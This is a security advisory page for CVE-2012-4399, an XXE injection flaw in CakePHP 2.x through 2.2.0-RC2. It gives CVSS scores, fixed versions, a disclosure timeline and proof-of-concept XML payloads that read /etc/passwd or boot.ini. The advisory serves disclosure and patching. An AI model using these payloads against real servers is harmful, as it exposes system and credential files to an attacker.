CakePHP 2.2.0-RC2 XXE Injection

2012-07-17 / 2012-10-16
Credit: Pawel Wylecial
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2012-4399
CWE: CWE-264


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

# Exploit title: CakePHP XXE injection # Date: 01.07.2012 # Software Link: http://www.cakephp.org # Vulnerable version: 2.x - 2.2.0-RC2 # Tested on: Windows and Linux # Author: Pawel Wylecial # http://h0wl.pl 1. Background Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code." 2. Vulnerability CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) does allow local file inclusion. 3. Proof of Concept Linux: <!DOCTYPE cakephp [ <!ENTITY payload SYSTEM "file:///etc/passwd" >]> <request> <xxe>&payload;</xxe> </request> Windows: <!DOCTYPE cakephp [ <!ENTITY payload SYSTEM "file:///C:/boot.ini" >]> <request> <xxe>&payload;</xxe> </request> 4. Fix Fix applied in version 2.2.1 and 2.1.5. See official security release: http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1 5. Timeline 1.07.2012 - vulnerability reported 13.07.2012 - response from CakePHP 14.07.2012 - confirmed and fix release

Referencje:

http://h0wl.pl


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top